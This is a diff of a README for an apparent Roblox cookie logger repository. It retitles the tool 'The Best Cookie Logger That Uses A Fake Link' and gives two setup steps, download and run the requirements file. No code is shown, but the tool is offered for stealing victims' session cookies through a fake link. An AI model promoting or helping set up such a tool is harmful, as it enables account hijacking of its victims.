zbenntt/Roblox-Cookie-LoggerV3/README.md

-# This Is The First Cookie Logger Fake Link
+# This Is The Best Cookie Logger That Uses A Fake Link

 Step 1; Download Zip and extract
 Step 2; Run the requirements file and wait until it finishes and installs all requirements